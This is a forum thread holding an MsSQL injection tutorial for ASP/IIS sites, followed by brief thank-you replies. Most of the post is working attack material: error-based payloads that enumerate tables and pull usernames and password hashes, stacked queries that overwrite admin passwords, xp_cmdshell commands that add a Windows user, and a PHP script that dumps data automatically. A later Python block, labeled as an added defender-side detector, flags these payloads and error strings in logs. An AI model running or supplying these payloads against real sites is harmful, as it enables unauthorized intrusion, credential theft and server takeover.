
#1 08-31-2013, 05:30 PM
Cartographer (Join Date: Aug 2013, Posts: 511)
Tutorial Injection MsSQL - Complete

DISCLAIMER: THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSES, FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU WILL HAVE TO TAKE FULL RESPONSIBILITY FOR ANY ACTION YOU DO AFTER READING THIS TUTORIAL.

Background

This article, entitled "Complete MsSQL Injection For Newbies", intends to provide the complete knowledge and know-how of SQL injection, especially targeted at MsSQL (ASP+IIS, because "it" occurs most frequently), except for the stacked query parts. First contribution over here...

0x00 The error output

Only the error output will be used to cover injection; building queries and the like will not be described.
To begin, I want to check whether we have found a bug; an error does not necessarily mean that there is an injection. To check, try to retrieve the MsSQL version.

Target:
Code:
http://site.com/script.asp?id=5'
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '5'.
/file.asp, line 1000
Errors may differ depending on what processes the MsSQL output (php, asp, cfm).

Obtain Version:
Code:
5' or 1=@@version--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3080.00 (Intel X86) Sep 6 2009 01:43:32 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to a column of data type int.
/file.asp, line 1000
The database name of the current user:
Code:
id=5' or 1=(select db_name())--
The user name of the owner of this database:
Code:
id=5' or 1=(select system_user)--
0x01 Search the tables and columns.

Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/file.asp, line 1000
Here table_name is the name of the first table. How do you get the name of the 5th table? In MSSQL there is no "limit" function, but there are other output options.

The first method. Using the method of exclusion (with the names of the tables).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name2','table_name3','table_name4'))--
The second method. The exclusion method again (without specifying the table names).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
The third method. Using the comparison operator ">" (with the "last" selected table name). With this method you can get even the 53423rd entry in the table, which options 1 and 2 cannot do, because MsSQL tries to go through all the selected records that we want to exclude with NOT IN (with more than 500 entries, the database begins to slow down noticeably).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')--
Columns are obtained the same way, only with the COLUMNS table.

0x02 Data output

Suppose in the Users table is a column id (int), username (varchar), password (binary).
In order to display different types of data, we will have to use data type conversion (cast, convert, etc.).

We retrieve the first entry in the id column:
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)--
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1' to data type int.
/inc/file.asp, line 104
Sometimes the conversion function cannot solve the problem; then the data can be displayed through the function used to convert selected data to XML format -> "FOR XML PATH" (since the 2005 version of MSSQL Server) -> we shall return to this function.

Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))--
It seems there was also a way to output it without any tags, but I forgot; something like )=

Now let's take a cell from the password column. "cast(password as binary)" seemed to work well, but there are times when FOR XML PATH, cast or convert do not give the desired result. Then you can look for other functions that are not yet described anywhere; one of them follows. (".." is an analog for accessing the system table => 'dbo').
Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--
Now let's take three cells from 3 different columns at a time (MsSQL has no function like concat() in MySQL, but here it is possible to join the output into a single cell using "%2B':'%2B". If my suspicions are correct, then %2B (+) was interpreted as a MsSQL + (plus), not as a space, due to which the joining takes place).
Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)--
If all types are displayed without errors, it can be done like this: ... TOP+1+id%2B':'%2Busername%2B':'%2Bpassword ... ;

In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '1:admin:e075739... ' to data type int.
/inc/file.asp, line 101
It can be a little easier, that is, nvarchar for all output cells (be careful: quotename will return null if the output data is more than 258 bytes -> 128 characters in unicode).

Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)--
If there is a filter/magic_quotes, then change it like this:

Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))--
0x03 Insert & Update

Another plus of MsSQL + IIS is that very often we can "break off" a request with the ";" sign and then create a new one.

Everything is done in much the same way.

Code:
5';+INSERT+INTO+Users+(id,username,password)+VALUES+(1,'admin','mypass')--
Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'--
The commands are executed.

If you have enough rights, usually the user "sa" (root in mysql), you can try some of the following commands:


How do I use them? Very simple: kill the request with ";" and then create your request:
Code:
5';exec master..xp_cmdshell 'dir c:\'--
Code:
5';exec master..xp_cmdshell 'net user admin password /add'--
Bypassing the quotes:
Code:
5';exec master..xp_cmdshell [net user admin password /add]--
0x04 Dump

Theoretically, dumping the entire database via injection without knowing the database structure is impossible. But you can get information in the following ways. First, parsing, 1 request - 1 record (I will post a parser later). Second, a function to parse through FOR XML RAW (~2000 characters per request); the script follows. Taken from pastebin.com

Code:
<?php
// Host and port of the ASP page being queried (values from the original script).
$host = "www.test.net";
$port = 80;
$xml = '';  // accumulates the FOR XML RAW fragments recovered from the error messages
// Each request retrieves one 1990-character slice of the XML output via a conversion error.
for($i=$j=0;;$i+=1990,$j++) {
    $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
    $p.= "Host: $host\r\n";
    $p.= "Connection: close\r\n\r\n";
    $ock = fsockopen(gethostbyname($host), $port);
    if(!$ock) {
        return false;  // at file scope this ends the script
    }
    fputs($ock, $p);
    $html='';
    while(!feof($ock)) {
        $html.= fgets($ock);
    }
    fclose($ock);
    // Split headers from body; stop when the server no longer returns a conversion error.
    $html = explode("\r\n\r\n",$html);
    if(!isset($html[1]) || stripos($html[1],'type mismatch')!==false) {
        break;
    }
    $out = array();
    // Extract the leaked slice from the "converting the nvarchar value '...'" error text.
    preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
    if(isset($out[1])) {
        $xml .= htmlspecialchars_decode($out[1]);
    } else {
        break;
    }
}
// Wrap the collected <a e="..."/> elements in a root node and print each table name.
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml.'</root>', $out);
xml_parser_free($r);
foreach($out as $el) {
    if(isset($el['attributes']['E'])) {
        echo $el['attributes']['E']."\r\n";
    }
}
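
As an added defender-side example (not part of the original post), the following Python detection logic scans constructed IIS-style log lines and response bodies for the request payloads and verbose MsSQL error messages that the tutorial above relies on; the log layout, the sample lines and the signature labels are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures, drawn from the payloads shown in the tutorial above;
# each is matched against the URL-decoded, lower-cased query string.
REQUEST_SIGNATURES = [
    (re.compile(r"@@version"), "version probe"),
    (re.compile(r"information_schema\.(tables|columns)"), "schema enumeration"),
    (re.compile(r"\b(cast|convert)\s*\("), "type-conversion extraction"),
    (re.compile(r"for\s+xml\s+(path|raw)"), "FOR XML extraction"),
    (re.compile(r"fn_varbintohexstr|quotename\s*\("), "hex/quotename extraction"),
    (re.compile(r";\s*(exec|insert|update)\b|xp_cmdshell"), "stacked query"),
    (re.compile(r"'\s*or\s+1\s*="), "tautology after quote break"),
]
# Response-side signatures: the verbose OLE DB/ODBC errors that leak the data.
RESPONSE_SIGNATURES = re.compile(
    r"OLE DB Provider for (SQL Server|ODBC Drivers) error '80040e(07|14)'"
    r"|(Syntax error|Conversion failed when) converting the nvarchar value"
    r"|Unclosed quotation mark after the character string")
# Assumed W3C-style IIS log layout: date time method uri-stem uri-query status.
LOG_LINE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

def classify_query(query):
    """Return the signature labels found in a raw (still URL-encoded) query string."""
    decoded = unquote_plus(query).lower()
    return [label for pat, label in REQUEST_SIGNATURES if pat.search(decoded)]

def response_leaks_sql_error(body):
    """True if a response body exposes an MsSQL error message (the extraction channel)."""
    return RESPONSE_SIGNATURES.search(body) is not None

def scan_log(lines):
    """Return (uri, query, labels) for every log line whose query matches a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        _, _, uri, query, _ = m.groups()
        labels = classify_query(query)
        if labels:
            hits.append((uri, query, labels))
    return hits
# Constructed sample log lines modelled on the tutorial's requests (not real traffic).
SAMPLE_LOG = [
    "2013-08-31 17:30:01 GET /script.asp id=5'+or+1=@@version-- 500",
    "2013-08-31 17:30:02 GET /script.asp id=5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- 500",
    "2013-08-31 17:30:03 GET /script.asp id=5';exec+master..xp_cmdshell+'dir+c:\\'-- 500",
    "2013-08-31 17:30:04 GET /script.asp id=5 200",
]
```

A hit on a request signature together with a matching error string in the response is the strongest signal; a matching response alone already shows that detailed database errors reach the client and should be replaced by a generic error page.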
#2 10-03-2013, 06:06 AM
virus_worm (Join Date: Oct 2013, Posts: 2)

Old tutorial bro,
but thanks anyway for your post.
But I advise, if you use it by hand,
this method makes you very tired.
So sometimes you should use a tool like Panlogin or Havij.
#3 10-24-2013, 08:28 AM
YaloS (Join Date: Oct 2013, Location: Russia, Posts: 1)

I think you are wrong. I am sure. Let's discuss it. Write to me in PM, we'll talk.
#4 03-19-2016, 10:47 PM
pipip (Join Date: Mar 2016, Posts: 6)

nice tutorial for newbies
#5 04-07-2016, 08:07 PM
rikketik (Join Date: Apr 2016, Posts: 9)

thanks
#6 04-10-2016, 12:24 PM
StalkerBA (Join Date: Apr 2016, Posts: 5)

thanks BRO, nice tutorial for newbies
#7 10-23-2016, 04:31 PM
samefuck (Join Date: Oct 2016, Posts: 4)

thanks for sharing
#8 12-08-2016, 04:28 AM
privateparty (Join Date: Dec 2016, Posts: 13)

useful info
#9 01-25-2017, 12:00 PM
joshupton2015 (Join Date: Jan 2017, Posts: 4)

nice tut, thanks a lot
#10 01-29-2017, 04:52 PM
salahskull (Join Date: Jan 2017, Posts: 9)

thank you